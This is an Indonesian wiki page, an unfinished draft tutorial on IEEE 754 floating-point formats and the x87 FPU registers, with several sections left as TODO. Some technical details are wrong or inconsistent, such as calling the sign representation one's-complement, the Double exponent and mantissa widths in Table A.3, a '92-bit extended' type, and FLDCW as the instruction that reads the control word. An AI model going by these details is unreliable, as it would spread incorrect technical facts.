OnnoCenterWiki - User contributions [en]

Noktah Mengambang

2008-08-01T02:27:16Z

Aa: New page: Pengantar Struktur Data dan Operasi Floating Point by: aa, aa.delphi@yahoo.com <a href="http://www.softindo.net">PT SoftIndo</a>, JAKARTA. <hr size=1><i>Status: DRAFT2</hr></i> <br>last u...

Pengantar Struktur Data dan Operasi Floating Point

by: aa, aa.delphi@yahoo.com
<a href="http://www.softindo.net">PT SoftIndo</a>, JAKARTA.
<hr size=1><i>Status: DRAFT2</hr></i>
<br>last update: 2006-11-00.
<ul>
<li><a href=#format>Format dan Tipe Data</a>
<li><a href=#pengolahan>Pengolahan Data Numerik</a>
<li><a href=#rujukan>Rujukan</a>
</ul>
<span id=abstrak></span>

<font size=+3>abstraksi</font>

Sekitar satu dekade yang lalu (sekitar '90-an), Math-Coprocessor masih
merupakan suatu kemewahan bagi pengguna PC, hanya professional (umumnya
di bidang grafis dan high-end desktop publishing) yang butuh dan terutama:
mampu memperolehnya. Buku-buku dan referensi pemrograman biasanya melewatkan
bagian Floating Point ini karena selain karena kerumitannya, lambat (lihat
tabel 1), juga dianggap tidak praktikal (jarang ada yang punya).



<table border=1>
<tr>
<td rowspan=2>Prosesor
<td colspan=2>Penjumlahan
<td colspan=2>Perkalian
<td colspan=2>Pembagian
</tr>
<tr>
<td>Integer
<td>Float
<td>Integer
<td>Float
<td>Integer
<td>Float
</tr>
<tr>
<td>i386/387
<td>2
<td>23-34
<td>9-38
<td>27-35
<td>43
<td>89
</tr>
<tr>
<td>i486
<td>1
<td>10
<td>12-42
<td>11
<td>43
<td>62 (35)
</tr>
<tr>
<td>Pentium 1
<td>3
<td>10
<td>3
<td>46
<td>33
<td>(19)
</tr>
<tr>
<td>PowerPC 6041
<td>3
<td>4
<td>3
<td>20
<td>31
<td>(18)
</tr>
<tr>
<td>MIPS R4x00
<td>1
<td>4
<td>10
<td>8 (7)
<td>69
<td>36 (23)
</tr>
<tr height=0>
<td width=120>
<td width=60>
<td width=60>
<td width=60>
<td width=60>
<td width=60>
<td width=60>
</tr>
</table>
<font size=-1>Tabel 1. Timing (dalam kurung = single precision/presisi tunggal)</font>

Disini akan dibahas lengkap tentang format data Floating Point IEEE 754 serta implementasinya dalam prosesor Intel keluarga x87. Dengan tulisan ini diharapkan pembaca bisa mendapatkan gambaran yang jelas mengenai format data Floating Point. Memahami format data floating point adalah suatu hal yang mendasar dan krusial dalam pemrograman numerik, tulisan ini diharap bisa memecahkan entry-barrier bagi pembaca/programer untuk memasuki area pemrograman/operasi numerik yang sering dianggap rumit atau tidak menyenangkan.

catatan:<ul>
<li>Saat ini (tahun 2000-an), standar minimal 'jatah' desktop (setidaknya di kota-kota besar) adalah Pentium --yang sebagian besar MMX, paling tidak kelas 486-lah, itupun sudah mulai terpinggirkan, i386 hanya dipakai untuk server printer 'console-mode-only'-nya FreeBSD, i286 tinggal sejarah, PC-XT/AT --kalau anda pernah dengar, sudah jadi barang antik di musium, dan IBM PC 8086 4.7MHz yang resolusi monitornya cuma setengah dari ponsel jaman sekarang, kini tinggal sisa-sisa fosil. Pendeknya hampir semua PC operasional saat ini sudah memiliki prosesor numerik built-in 'take for granted' di dalamnya.
</ul>

<font size=+3>Latar Belakang</font>

Ketika berencana untuk memasukkan prosesor numerik dalam prosesor 8086-nya, J. Palmer dari Intel menyadari bahwa para insinyur dan disainer chips bukanlah orang yang tepat untuk merancang format numerik, untuk itu dia menyewa khusus orang-orang terbaik di bidang analisa numerik, mereka adalah: J. Coonen, W. M. Kahan, dan H.S. Stone, yang membuat desain sebegitu bagusnya sehingga diadopsi oleh IEEE sebagai format standar floating point, --artinya semua prosesor yang konform dengan IEEE akan menggunakan format Floating Point yang sama, suatu hal yang sangat memudahkan bagi para perancang kompiler.

Floating Point Unit (FPU) x87 awalnya cuma pendamping untuk processor 80186, diteruskan oleh penerusnya: i286, i386, dan i486-SX. mulai kelas x486-Dx (keluar tahun 1989) dan sesudahnya, Intel mengemas processor utama dan numerik dalam satu prosesor (sepertinya memang sudah seharusnya demikian, bukan?), sehingga tidak ada lagi processor numerik terpisah.


<pre>----------------------------------------------------</pre>
<span id=format></span>

<font size=+3>A. Format dan Tipe Data</font>

<font size=+2>A.1. Integer dan Floating Point</font>

Berbeda dari bilangan integer yang jaraknya selalu konstan: satu, antara dua bilangan real selalu akan terdapat nilai yang banyaknya tak terhingga, sehingga masalah utama dalam menyusun struktur format Floating Point adalah memaksimalkan jangkauan (range) bilangan dalam keterbatasan memori/register yang ada tanpa mengorbankan terlalu banyak akurasi perhitungan (baik normal maupun transedental), minimum overhead untuk kecepatan akses dan struktur diatur sedemikian rupa sehingga memudahkan untuk operasi lanjutan. Tujuan inilah yang ingin dicapai oleh para perancang format Floating Point.

catatan:<ul>
<li>operasi normal adalah: penjumlahan, pengurangan, perkalian dan pembagian
<li>operasi transedental misalnya: log, sin, cos, dan tan.
</ul>

Seperti pada integer, Floating Point juga menggunakan basis 2 (biner) untuk merepresentasikan sebuah bilangan (disebut juga sebagai binary-floating-point) yang mencakup suatu subset dari continuum bilangan real (antara minus tak-hingga s.d. plus tak-hingga). Struktur format Floating Point selanjutnya menentukan range dari bilangan real yang dapat digunakan dalam perhitungan.

<font size=+2>A.2. Struktur</font>

Struktur Data Floating Point (berturut-turut dari Most-ke-Least Significant-Bit) terdiri atas:
<ul>
<li> a. sign bit: bit penanda negatif/positif
<li> b. exponent: eksponen digit, kepangkatan dari: dua
<li> c. 1: satu
<li> d. mantissa fraction (atau disebut juga trailing significand): desimal digit, pecahan kurang dari: satu
</ul>

Dalam referensi Intel, butir c. dan d. diatas sebagai kesatuan disebut sebagai Significand, berdasarkan nilai inilah diperoleh angka-angka atau digit sesungguhnya.

<font size=+1>A.2.1. Sign bit</font>

Tidak seperti format integer yang menggunakan notasi two's-complement, format Floating Point menggunakan notasi one's-complement, artinya selalu berupa nilai positif (operasi NEG adalah 2's complement, sementara operasi NOT adalah 1's complement). Nilai negatif semata-mata ditunjukkan oleh sign-bit, implikasinya, dalam floating Point terdapat ambiguitas nilai-0 yang bisa bertanda negatif atau positif tergantung dari instruksi/operasi, namun ini tidak jadi masalah, di seluruh operasi aritmetik, kedua nilai 0 tersebut dianggap identik.

<font size=+1>A.2.2. Exponent</font>

Format exponent sama dengan format integer positif (unsigned), dibaca seperti layaknya membaca integer, dengan satu interpolasi khusus yaitu: dihitung dengan menyertakan suatu konstanta tertentu yang disebut sebagai bias (dikurangi nilainya dengan bias). Misalnya jika exponent = 10 dan bias = 100, maka nilainya setelah penyesuaian bias adalah 10-100 = -90. Dalam beberapa referensi, nilai setelah penyesuaian bias ini disebut juga sebagai 'True Exponent'. Dengan penyesuaian ini, selain tetap mengakomodasi negatif exponensial, struktur bit-per-bit (bitwise) data bilangan akan menjadi simetris, berurut dari nilai yang terkecil sampai terbesar, keuntungannya antara lain adalah: mengurutkan data Floating Point akan sama mudahnya dengan mengurutkan data integer, tidak memerlukan algoritma khusus.

Nilai bias diperoleh dari nilai maksimum dalam format integer (signed), atau separuh dari nilai maksimum (high value) dalam format integer positif (unsigned). Nilai ini juga merupakan batas minimum dan maksimum dari nilai exponent (max = bias, min = -(bias-1)).

Contohnya, untuk tipe data Single dengan exponent berukuran 8-bit, nilai biasnya adalah: 127 (2^7-1), tipe Double dengan 11 bit exponent: 1023 (2^10-1), dan Double-Extended dengan 15 bit exponent: 16383 (2^14-1)



<table border=1>
<tr>
<td height=24>Tipe Data
<td>exponent
<td>low
<td>high
<td>bias
<td>min<td>max
</tr>
<tr>
<td>Single
<td>8 bit
<td>0
<td>255
<td>127
<td>-126
<td>+127
</tr>
<tr>
<td>Double
<td>11 bit
<td>0
<td>2047
<td>1023
<td>-1022
<td>+1023
</tr>
<tr>
<td>Double Extended
<td>15 bit
<td>0
<td>32767
<td>16383
<td>-16384
<td>+16383
</tr>
<tr height=0>
<td width=120>
<td width=60>
<td width=60>
<td width=60>
<td width=60>
<td width=60>
<td width=60>
</tr>
</table>
<font size=-1>Tabel A.2.2. Contoh nilai bias dari beberapa tipe data Floating Point</font>

<font size=+1>A.2.3. bit 1 (satu)</font>

Dalam bilangan desimal (basis-10), suatu nilai, misalnya: 9000, bisa dinotasikan sebagai 9.0 x 10^3 (atau 9.0 E+3). Contoh lain, 0.07890 bisa dinotasikan juga sebagai 7.89 x 10^-2 (atau 7.89 E-2)

Berapapun nilainya, suatu bilangan desimal dapat dinotasikan sebagai N.XXX... x 10^Y atau N.XXX... E+Y (Y bisa berupa nilai negatif, N bilangan bulat selain 0), dengan notasi ini dapat dilihat bahwa nilai N diatas akan lebih besar dari 0 dan lebih kecil dari 10, 0 < N < 10.

Penyederhanaan notasi diatas disebut juga sebagai di-<b>normalisir</b>

Seperti telah disebutkan dalam butir A.1., format Floating Point menggunakan notasi biner, jika dilakukan normalisasi pada bilangan tersebut maka nilai N (analog dengan bilangan desimal diatas) pasti lebih besar dari 0 dan lebih kecil dari 2, 0 < N < 2, atau sama dengan 1.

Hal itulah yang dilakukan oleh format Floating Point, melakukan normalisasi bilangan sehingga menghasilkan Most-Significant-Bit (MSB) dari Significand akan selalu sama dengan 1, bentuk ini disebut juga sebagai NORMALIZED.

Karena nilai 1 ini tidak pernah berubah, maka kemudian nilai ini dihapus/dieliminasi agar lebih efisien (ada tambahan 1-bit untuk mantissa). Tapi, meskipun tidak tampak, nilai 1 ini selalu dianggap ada (implisit), kecuali untuk tipe Double-Extended. Nilai 1 dalam tipe Double-Extended tidak dieliminasi dan dinyatakan secara eksplisit. Selain perbedaan ini, struktur format tipe Single, Single-Extended, Double, dan Double-extended adalah identik.

catatan:<ul>
<li>Dalam tipe Double-Extended kapasitas Significand adalah 64-bit, atau persis kelipatan dword/qword sehingga lebih mudah dan cepat untuk diakses apa adanya.
<li>Anomali tipe Double-Extended berlaku juga untuk proprietary Intel Itanium (IA-64) 82-bits Extended-Register.
<li>Karena keterbatasan kapasitas register, untuk merepresentasikan bilangan yang sangat kecil (di kisaran 2^E-high) bisa terjadi MSB Signifand bernilai 0, kasus ini disebut DENORMALIZED (sekarang disebut SUBNORMAL).
<li>Jika terjadi denormal/subnormal, bit-satu seperti disebut dalam butir A.2.c diatas tidak lagi bernilai satu tapi nol.
</ul>



<table border=1>
<tr>
<td height=24>Format
<td>2^
<td>10^
<td>2^
<td>10^
</tr>
<tr>
<td>Single
<td>-149
<td>-46
<td>-126..-150
<td>-38
</tr>
<tr>
<td>Double
<td>-1074
<td>-324
<td>-1022..-1075
<td>-308
</tr>
<tr>
<td>Extended
<td>-16445
<td>-4951
<td>-16382..-16445
<td>-4932
</tr>
<tr>
<td width=120>
<td width=60>
<td width=60>
<td width=150>
<td width=60>
</tr>
</table>
<font size=-1>Tabel A.2.3. Jangkauan nilai subnormal</font>

<font size=+2>A.2.4. Mantissa fraction</font>

Mantissa fraction adalah bagian pecahan dari Significand (setelah bit 1, baik implisit maupun explisit).

Significand adalah kesatuan butir A.2.c dan A2.d diatas

Significand pangkat exponent setelah penyesuaian bias (true-exponent) adalah nilai sebenarnya yang ingin direpresentasikan oleh data Floating Point yang bersangkutan.

Lihat juga butir A.4. tentang Kondisi Khusus.

<font size=+2>A.3. Tipe Data Floating Point, IEEE Standard 754 conformant tediri dari:</font><ul>
<li>a. Binary16, 16 bit
<li>b. Single Precision (Binary32), 32-bit
<li>c. Single-Extended Precision, 43-bit
<li>d. Double Precision (Binary64), 64-bit
<li>e. Double-Extended Precision, 80-bit
<li>f. Itanium (IA-64) Double-Extended Precision, 82-bit
<li>g. Quadruple Precision (Binary128), 128-bit
</ul>



<table border=1>
<tr>
<td rowspan=2>Tipe
<td rowspan=2>Lebar
<td rowspan=2>Exp
<td colspan=2>Significand
<td rowspan=2>Range biner
<td rowspan=2>Range desimal
<td rowspan=2>digit signifikan
</tr>
<tr>
<td>1
<td>mantissa
</tr>
<tr>
<td>Binary16
<td>16
<td>5
<td>0 (imp)
<td>10
<td>2^-14..2^15
<td>0.000061..32768
<td>4-6
</tr>
<tr>
<td>Single
<td>32
<td>8
<td>0 (imp)
<td>23
<td>2^-126 .. 2^127
<td>1.18E-38 .. 3.40E+38
<td>6-9
</tr>
<tr>
<td>Single Extended
<td>44
<td>10
<td>1 (exp)
<td>32
<td>2^-1022 .. 2^1023
<td>1.18E-38 .. 3.40E+38
<td>11-12
</tr>
<tr>
<td>Double
<td>64
<td>10
<td>0 (imp)
<td>53
<td>2^-1022..2^1023
<td>2.23E-308..1.79E+308
<td>15-17
</tr>
<tr>
<td>Double Extended
<td>80
<td>15
<td>1 (exp)
<td>63
<td>2^-16382..2^16383
<td>3.37E-4932..1.18E+4932
<td>18-21
</tr>
<tr>
<td>Itanium FP-Reg
<td>82
<td>17
<td>1 (exp)
<td>63
<td>2^-65534..2^65535
<td>5.00E-19729..1.00E+19729
<td>18-21
</tr>
<tr>
<td>Quadruple
<td>128
<td>15
<td>0 (imp)
<td>112
<td>2^-16382..2^16383
<td>3.37E-4932..1.18E+4932
<td>33-36
</tr>
<tr height=0>
<td width=120>
<td width=50>
<td width=50>
<td width=60>
<td width=60>
</tr>
</table>
<font size=-1>Tabel A.3. Tipe Data Floating Point</font>

catatan:<ul>
<li>Beberapa sumber menyatakan bahwa hanya terdapat 3 format standar IEEE, yaitu: single, double dan quadruple. Tapi supaya jelas perbedaannya, dalam tulisan ini disebutkan seluruh varian (baik interpretasi maupun implementasi) dari format IEEE 754:
<li>128-bit Quad Precision Floating Point ditambahkan dalam revisi IEEE Standard 754 tahun 2004.
<li>Revisi IEEE 754 2006 menggunakan istilah: binary16, binary32, binary64 dan binary128.
<li>Single-Extended Precision tidak umum dipakai, sejak awal munculnya x87, Intel tidak pernah menggunakan tipe ini.
<li>Secara internal, Intel x87 menggunakan tipe 80-bits Double-Extended, sementara kelas Itanium menggunakan tipe 82-bits Extended-Register Floating-Point.
</ul>

<font size=+2>A.4. Kondisi Khusus.</font>

Jika nilai true exponent sama dengan min atau max (nilai exponent sama dengan 0 atau high) terjadi nilai-nilai khusus sbb.



<table border=1>
<tr>
<td height=24> true-exponent
<td>mantisa
<td>status/nilai
</tr>
<tr>
<td>min
<td>0
<td>nol/underflow/overflow
</tr>
<tr>
<td>min
<td>> 0
<td>denormal (subnormal)
</tr>
<tr>
<td>max
<td>0
<td>tak-hingga (infinite)
</tr>
<tr>
<td>max
<td>> 0
<td>bukan angka (not-a-number atau NaN)
<tr height=0>
<td width=120>
<td width=60>
</tr>
</table>
<font size=-1>Tabel A.4.1 Kondisi khusus</font>

Formasi bit pada underflow untuk sign-bit=1 (negatif) dan overflow (positif), sama dengan formasi bit untuk nilai 0, bedanya kondisi ini memicu exception yang mengindikasikan bahwa operasi sebelumnya menimbulkan undeflow/overflow.

Kondisi NaN terdiri dari quiet-NaN, signaling-Nan, serta nilai tak-tentu. Selain untuk keperluan pengurutan (sorting), NaN juga berpengaruh terhadap kontrol program, karena prosesor akan bereaksi berbeda sesuai jenis NaN ini. Perbedaan antara signaling NaN dan quiet-NaN hanya terletak pada most-significant-bit (MSB) dari mantissa fraction sbb:<ul>
<li>Signaling NaN (SNaN): MSB-bit dari mantissa fraction = 0
<li>Quiet Nan (QNaN): MSB-bit dari mantissa fraction = 1
</ul>

Selanjutnya terdapat kondisi tak-tentu pada QNaN jika sign-bit=1 DAN hanya MSB mantissa-fraction yang bernilai=1 (bit mantissa-fraction lainnya=0). Jika sign-bit=0 (bilangan positif) kondisi ini termasuk kedalam QNaN. Kondisi tak-tentu sebagian merupakan konsekuensi dari implisit bit (karena sebetulnya tidak dapat dipastikan dari hasil operasi, apakah bit-satu bernilai 1 atau 0). Pada prosesor intel, semua kondisi NaN mengeset eksplisit bit=1 (QNaN) dan kondisi tak-tentu menandakan terjadinya invalid-operation (misalnya seperti operasi 0/0).



<table border=1>
<tr>
<td height=24 rowspan=2> Kondisi
<td colspan=3>range biner/simbol
<td rowspan=2>range dalam hexa
</tr>
<tr>
<td>Sign
<td>Exponent (e)
<td>23-bit Mantissa
</tr>
<tr>
<td>-QNaN
<td>1
<td>high
<td>11111111111111111111111 s.d.<br>
10000000000000000000001
<td>FFFFFFFF ~ FFC00001
</tr>
<tr>
<td>Indefinite
<td>1
<td>high
<td>10000000000000000000000
<td>FFC00000
</tr>
<tr>
<td>-SNaN
<td>1
<td>high
<td>01111111111111111111111 s.d.<br>
00000000000000000000001
<td>FFBFFFFF ~ FF800001
</tr>
<tr>
<td>-Infinite
<td>1
<td>high
<td>0
<td>FF800000
</tr>
<tr>
<td>-Normal
<td>1
<td>0 < e < high
<td>0 s.d.<br>
11111111111111111111111
<td>FF7FFFFF ~ 80800000
</tr>
<tr>
<td>-DeNormal
<td>1
<td>0
<td>11111111111111111111111 s.d.<br>
00000000000000000000001
<td>807FFFFF ~ 80000001
</tr>
<tr>
<td>-0
<td>1
<td>0
<td>0
<td>80000000
</tr>
<tr>
<td>+0
<td>0
<td>0
<td>0
<td>0
</tr>
<tr>
<td>+DeNormal
<td>0
<td>0
<td>00000000000000000000001 s.d.<br>
11111111111111111111111
<td>00000001 ~ 007FFFFF
</tr>
<tr>
<td>+Normal
<td>0
<td>0 < e < high
<td>0 s.d.<br>
11111111111111111111111
<td>00800000 ~ 7F7FFFFF
</tr>
<tr>
<td>+Infinite
<td>0
<td>high
<td>0
<td>7F800000
</tr>
<tr>
<td>+SNaN
<td>0
<td>high
<td>00000000000000000000001 s.d.<br>
01111111111111111111111
<td>7F800001 ~ 7FBFFFFF
</tr>
<tr>
<td>+QNan
<td>0
<td>high
<td>10000000000000000000000 s.d.<br>
11111111111111111111111
<td>7FC00000 ~ 7FFFFFFF
</tr>
<tr height=0>
<td width=120>
<td width=60>
</tr>
</table>
<font size=-1>Tabel A.4.2. Pola bit dan status dari tipe data Single Precision (32-bit)</font>

Dalam ringkasan dibawah, supaya lebih mudah digambarkan, kita buat suatu tipe data floating point hipotetik yang memiliki 8-bit significand (dengan bit-1 implisit).



<table border=1>
<tr>
<td height=24> exponent
<td>true-exponent
<td>significand (bin-8)
<td>status
</tr>
<tr>
<td>0
<td>min
<td>0
<td>nol
</tr>
<tr>
<td>0
<td>min
<td>0
<td>underflow/overflow
</tr>
<tr>
<td>0
<td>min
<td>> 0
<td>subnormal
</tr>
<tr>
<td>1..high-1
<td>min+1..max-1
<td>sebarang
<td>normal
</tr>
<tr>
<td>high
<td>max
<td>0
<td>tak-hingga
</tr>
<tr>
<td>high
<td>max
<td>00000001..01111111
<td>SNaN
</tr>
<tr>
<td>high
<td>max
<td>10000000
<td>tak-tentu/QNaN
</tr>
<tr>
<td>high
<td>max
<td>10000001..11111111
<td>QNan
<tr height=0>
<td width=100>
<td width=120>
<td width=150>
</tr>
</table>
<font size=-1>Tabel A.4.3. Ringkasan Status Nilai Data Floating Point, tanpa sign-bit</font>


<pre>----------------------------------------------------</pre>
<span id=pengolahan></span>

<font size=+3>B. Pengolahan Data Numerik
</font>

<font size=+2>B.1. Tipe Data (Review)</font>

Tipe data yang dikenal oleh prosesor Intel

<font size=+1>B.1.1 Integer</font>
<ul>
<li>byte 8-bit
<li>word 16-bit
<li>double word 32-bit
<li>quad word 64-bit
<li>double quad word 128-bit
</ul>

[GAMBAR]

<font size=+1>B.1.2. Real</font>
<ul>
<li>single 32-bit
<li>double 64-bit
<li>extended 80-bit
<li>extended 92-bit
</ul>

[GAMBAR]

<font size=+1>B.1.3. Esoterik </font>(dikenal secara tidak langsung melalui operasi yang dikhususkan untuk tipe data ybs. atau dari pengaruhnya terhadap register flags)
<ul>
<li>boolean, 1 bit
<li>nibble 4-bit
<li>BCD 8-bit (hanya low-nibble yang digunakan)
<li>packed-BCD 8-bit (2 digit desimal per-byte)
<li>packed-BCD 80-bit (18 digit desimal dengan sign-bit)
<li>packed word 8 x word, 128-bit
<li>packed dword 4 x dword, 128-bit
<li>packed qword 2 x qword, 128-bit
<li>packed single 4 x single, 128-bit
<li>packed double 2 x double, 128-bit
</ul>
[GAMBAR]

<font size=+2>B.2. Register Floating Point Unit</font>

<font size=+1>B.2.1. FPU Stack</font>

Register FPU stack terdiri dari 8 unit register numerik masing-masing berukuran 80-bit bertipe double-extended, tersusun dalam tumpukan (stack) yang diberi nomor urut menurun dari 7 s.d. 0, diakses dan diperlakukan sperti register stack biasa: diakses langsung register tertentu atau dengan menggunakan instruksi push/pop. Sebagai indikator terdapat TOP di register status yang menunjukkan sisa register FPU stack yang tersedia.

Semua operasi Floating Point (kecuali operasi kontrol) akan melibatkan register FPU stack, penomoran/pengalamatan dilakukan secara relatif dari top-of-stack saat ini. Jika operand register FPU tidak disebut secara explisit, kebanyakan assembler akan menterjemahkan sebagai top-of-stack saat ini atau st(0).

Yang perlu diingat adalah bahwa kebanyakan operasi aritmetik akan secara otomatis memuat hasil perhitungan kedalam FPU stack (push FPU stack) yang merubah susunan FPU stack. Jika suatu nilai sebelumnya diakses dengan st(n), setelah operasi semacam ini nilai yang sama akan terdapat di st(n+1).

catatan:<ul>
<li>indikator TOP sebetulnya menunjukkan top-of-stack saat ini, dalam operasi normal (tanpa trik yang memodifikasi langsung status FPU) nilainya tidak terlalu diperhatikan, karena pengalamatan register selalu menggunakan st(n) --berupa offset relatif dari TOP itu sendiri.
</ul>

<font size=+1>B.2.2. Control</font>

Control word, berukuran 16-bit, tidak berupa register fisik, untuk membacanya harus dimuat dulu dengan instruksi FLDCW kedalam register/memori 16-bit, atau menggunakan instruksi FLDENV dan FSAVE/FNSAVE:



<font size=-1>FPU Control Word</font>
<table border=1>
<tr>
<td height=24 width=24>F<td width=24>E<td width=24>D<td width=24>C
<td width=24>B<td width=24>A<td width=24>9<td width=24>8
<td width=24>7<td width=24>6<td width=24>5<td width=24>4
<td width=24>3<td width=24>2<td width=24>1<td width=24>0
</tr>
<tr>
<td colspan=3>reserved
<td>IC<td colspan=2>RC<td colspan=2>PC
<td colspan=2>reserved
<td>P<td>U<td>O<td>Z<td>D<td>I
</tr>
</table>
<pre>
rsv. - RESERVED (dicadangkan)

IC - Infinity Control, hanya di prosesor intel287™, sekarang tidak digunakan lagi.

RC - Rounding Control (pembulatan)
00 : pembulatan terdekat (nearest or even)
01 : pembulatan kebawah menuju -Infinite
10 : pembulatan keatas menuju +Infinite
11 : pembulatan integer

PC - Precision COntrol
00 : 24-bit (single)
01 : dicadangkan
10 : 53-bit (double)
11 : 64-bit (extended)

bit 0 s.d. 5 adalah Exception Masks, berkorespondensi dengan register Status:
P : Precision
U : Underflow
O : Overflow
Z : Zero Divide
D : Denormalized Operand
I : Invalid Operation
</pre>

catatan:<ul>
<li>Untuk mempertahankan akurasi pembulatan, terutama dalam kasus relative error yang tinggi, secara internal, FPU memiliki 3 bit tambahan (guard, round dan sticky).
<li>Bilangan real mungkin akan dibulatkan jika tempat penyimpanan akhir (destination operand) berupa format integer atau format real yang ukurannya lebih kecil.
</ul>

<font size=+1>B.2.3. Status</font>

Status word, berukuran 16-bit, tidak berupa register fisik. untuk membacanya harus dimuat dulu ke memori dengan instruksi FLDENV atau FSAVE/FNSAVE:



<font size=-1>FPU Status Word</font>
<table border=1>
<tr>
<td height=24 width=24>F<td width=24>E<td width=24>D<td width=24>C
<td width=24>B<td width=24>A<td width=24>9<td width=24>8
<td width=24>7<td width=24>6<td width=24>5<td width=24>4
<td width=24>3<td width=24>2<td width=24>1<td width=24>0
</tr>
<tr>
<td>B<td>C3<td colspan=3>TOP
<td>C2<td>C1<td>C0<td>E<td>S
<td>P<td>U<td>O<td>Z<td>D<td>I
</tr>
</table>
<pre>
B - Busy Flag
C0 s.d. C3 - Condition Code
korespondensi dengan Integer Flags
C0 ~ Carry Flag (CF)
C1 ~ tidak ada kesetaraan
C2 ~ Parity Flag (PF)
C3 ~ Zero Flag (ZF)

TOP - nilai top-of-stack saat ini
E - Error Summary
S - Stack Fault

bit 0 s.d. 5 adalah Exception Flags, berkorespondensi dengan register Kontrol:
P : Precision
U : Underflow
O : Overflow
Z : Zero Divide
D : Denormalized Operand
I : Invalid Operation
</pre>

Interpretasi Condition Code



<table border=1>
<tr>
<td height=24> Instruksi<td>C0<td>C3<td>C2<td>C1
</tr>
<tr>
<td>FTST, FCOM/P/PP, FICOM/P, FUCOMPP
<td colspan=2> hasil perbandingan
<td>operand tak terbandingkan
<td>0 atau error Over/Underflow
</tr>
<tr>
<td>FXAM
<td colspan=3> kelas operand
<td>sign-bit atau error O/U
</tr>
<tr>
<td>FPREM,FPREM1
<td>Quad-2
<td>Quad-1
<td>0: tuntas<br> 1: tidak tuntas
<td>Quad-0 atau error O/U
</tr>
<tr>
<td>FIST, FBSTP, FRINDINT, FST/P,<br>
FADD, FMUL, FDIV/R, FSUB/R,<br>
FSCALE, FSQRT, FPATAN,<br>
F2XM1, FYL2X, FYL2XP1<br>
<td colspan=3> nilai tidak tentu
<td>pembulatan keatas atau error O/U
</tr>
<tr>
<td>FPTAN, FSIN, FCOS, FSINCOS
<td colspan=2> nilai tidak tentu
<td>0: tuntas<br> 1: tidak tuntas
<td>pembulatan keatas atau error O/U,<br>
jika C2=1 maka nilainya tidak tentu
</tr>
<tr>
<td>FCHS, FABS, FXCH, FINCSTP, FDECSTP,<br>
muat Konstanta tertentu, FXTRACT,<br>
FLD, FILD, FBLD, FSTP extended
<td colspan=3> nilai tidak tentu
<td>0 atau error O/U
</tr>
<tr>
<td>FLDENV, FRSTOR
<td colspan=4> sesuai dengan nilai yang tersimpan/dimuat
</tr>
<tr>
<td>FLDCW, FSTENV, FSTCW, FSTSW, FCLEX
<td colspan=4> nilai tidak tentu
</tr>
<tr>
<td>FINIT,FSAVE
<td colspan=4> 0
</tr>
<tr> </tr>
</table>
<font size=-1>Tabel B.2.3. Interpretasi kode kontrol hasil instruksi floating point</font>

<font size=+1>B.2.4. Tag</font>

Tag word, berukuran 16-bit, tidak berupa register fisik. untuk membacanya harus dimuat dulu ke memori dengan instruksi FLDENV atau FSAVE/FNSAVE kedalam memori:

Tag word berisi status seluruh isi FPU stack (8 unit register). TAG-0 berisi status st(0), TAG-1 berisi status st(1), dan seterusnya sampai TAG-7.



<font size=-1>FPU Tag</font>
<table border=1>
<tr>
<td height=24 width=24> F<td width=24> E<td width=24> D<td width=24> C
<td width=24> B<td width=24> A<td width=24> 9<td width=24> 8
<td width=24> 7<td width=24> 6<td width=24> 5<td width=24> 4
<td width=24> 3<td width=24> 2<td width=24> 1<td width=24> 0
</tr>
<tr>
<td colspan=2> tag 7<td colspan=2> tag 6
<td colspan=2> tag 5<td colspan=2> tag 4
<td colspan=2> tag 3<td colspan=2> tag 2
<td colspan=2> tag 1<td colspan=2> tag 0
</tr>
</table>
<pre>
Nilai Tag:
00 = Valid
01 = 0 (nol)
10 = Kondisi khusus: Invalid (NaN atau unsupported), tak-hingga atau DENORMAL/SUBNORMAL
11 = Kosong
</pre>

<pre>----------------------------------------------------</pre>

<font size=+3>C. Instruksi Numerik</font>

<font color=blink>[TODO]</font>

<font size=+2>C.1. Transfer Data: Load/Store/Exchange Data</font>

<font color=blink>[TODO]</font>

<font size=+2>C.2. Operasi Aritmetik: Penjumlahan, Pengurangan, Perkalian, Pembagian, Akar Kuadrat, Skala, Ekstrak, Pembulatan, Bilangan Mutlak, Pecahan, dan Negasi</font>

<font color=blink>[TODO]</font>

<font size=+2>C.3. Operasi Transedental: Sinus, Cosinus, Sin/Cos, Tangen dan Arctangen, 2^x-1, Logaritma basis 2: y Log 2^X dan y Log 2^(X+1)</font>

<font color=blink>[TODO]</font>

<font size=+2>C.4. Konstanta: 0, 1, pi, 2 Log 10, 10 Log2, 2 Log e, e Log 2</font>

<font color=blink>[TODO]</font>

<font size=+2>C.5. Kontrol: Load/Store Control/Status/Environment, Save/Restore/Clear Exception dan Intialisasi</font>

<font color=blink>[TODO]</font>

<pre>----------------------------------------------------</pre>

<font size=+3>D. Contoh Program</font>

<font color=blink>[CODE-REF]</font>

<pre>
Delphi interface:
Ordinals.pas
BigIntX.pas
</pre>

<pre>----------------------------------------------------</pre>

<font size=+3>E. Ringkasan</font>

<font color=blink>[TODO]</font>


<pre>----------------------------------------------------</pre>
<span id=rujukan></span>

<font size=+3>F. Rujukan</font>

Rujukan pilihan:<ul>
<li>"Standard for Floating-Point Arithmetic P754", Draft 1.9, IEEE Computer Society, 2006.
<li>"IEEE Standard 754 for Binary Floating-Point Arithmetic", William Kahan, on Lecture Notes on the Status of, 1997.
<li>"IEEE Standard 754 Floating Point Numbers", Steve Hollasch, 2001.
<li>"Intel Itanium Architecure Software Developer's Manual", Vol.1: Application Architecture, 1:75-98, Intel Corp., 2002.
<li>"Intel Itanium Architecure Software Developer's Manual", Vol.3: Instruction Set Reference, 3:821-832, Intel Corp., 2002.
<li>"Pentium Processor Family Software Developer's Manual", Vol.3: Architecture and Programming Manual, 6:1-42,7:1-18,25:84-161, Intel Corp., 1995.
<li>"What Every Computer Scientist Should Know About Floating Point Arithmetic", 176-178, David Goldberg, Assoc. for Computing Machinery, Inc., 1991.
</ul>

Bacaan tambahan:<ul>
<li>"(Complete) Tutorial to Understand IEEE Floating Point Errors", Microsoft Knowledge Base Q42980, Microsoft Corp., 2005.
<li>"Differences Among IEEE 754 Implementations", Sun Microsystems Inc., 1997.
<li>"Floating Point Processor." Microsoft® Encarta® 2005 [DVD]. Redmond, WA: Microsoft Corp., 2004.
<li>"General Decimal Arithmetic Specification", Mike Cowlishaw, IBM UK Lab., 2003.
<li>"How Futile are Mindless Assesments of Roundoff in Floating-Point Computation", William Kahan, 2006.
<li>"IEEE Floating point Standard", Wikipedia, Internet, 2005.
<li>"Let's Get to the (Floating) Point", 20-22, Chris Hecker, Game Developer, 1997.
<li>"Representation of IEEE 754 Floating Point Format", Motorola Inc., 2000.
